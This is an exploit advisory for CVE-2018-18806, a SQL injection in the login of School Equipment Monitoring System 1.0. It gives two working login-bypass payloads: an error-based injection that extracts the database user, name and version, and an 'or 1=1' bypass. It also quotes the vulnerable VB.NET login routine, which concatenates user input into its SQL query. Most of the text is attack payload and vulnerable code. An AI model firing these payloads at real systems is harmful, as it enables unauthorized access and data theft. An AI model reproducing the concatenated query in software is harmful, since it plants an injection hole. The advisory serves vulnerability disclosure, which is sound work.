#Exploit Title: School Equipment Monitoring System 1.0 - 'login' SQL Injection

Dork: N/A

Date: 2018-10-29

Exploit Author: Ihsan Sencan

Vendor Homepage: https://www.sourcecodester.com/users/janobe

Software Link: https://www.sourcecodester.com/sites/default/files/download/janobe/sems_0.zip

Version: 1.0

Category: Windows

Tested on: WiN7_x64/KaLiLinuX_x64

CVE: CVE-2018-18806

POC:

1)

User: '||(SEleCT 'Efe' FRoM DuaL WheRE 113=113 AnD (SEleCT 64 FRom(SELeCT CoUNT(*),ConCAT(ConCAT(0x203a20,UsER(),DAtABAsE(),VErSIoN()),(SelEcT (ELT(64=64,1))),FLooR(RAnD(0)*2))x FrOM INFOrMATIoN_SchEMA.pLUGINS GroUP By x)a))||'
Pass: Null

POC:

2)

User: 'or 1=1 or ''='

Pass: Null

https://4.bp.blogspot.com/-ILPqY1iygBY/W9YnEkjH9fI/AAAAAAAAENQ/34rcdTiwPDIeBzPhuj8roYPMIPOshiFvwCLcBGAs/s1600/sql2.png

#[PATH]/include/user.vb / 28 / '" & username & "'
#....
#24 Public Sub login(ByVal username As Object, ByVal pass As Object)
#25 Try
#26
#27 con.Open()
#28 reloadtxt("SELECT * FROM tbluseraccounts WHERE Username= '" & username & "' and Pass = sha1('" & pass & "')")
#29
#30
#31 If dt.Rows.Count > 0 Then
#32
#33 If dt.Rows(0).Item("Role") = "Administrator" Then
#34 MsgBox("Welcome " & dt.Rows(0).Item("Role"))
#35 Form1.Text = "User :" & dt.Rows(0).Item("Fullname")
#36 Form1.LogoutToolStripMenuItem.Text = "Logout"
#37 visibleMenu("true", "admin")
#38 LoginForm1.Close()
#39 Else
#40 visibleMenu("true", "not admin")
#41 Form1.LogoutToolStripMenuItem.Text = "Logout"
#42 LoginForm1.Close()
#43 End If
#44
#45 Else
#46 MsgBox("Acount doest not exits!", MsgBoxStyle.Information)
#47 End If
#48 Catch ex As Exception
#49 MsgBox(ex.Message)
#50 End Try
#51 con.Close()
#52 da.Dispose()
#53 End Sub
#....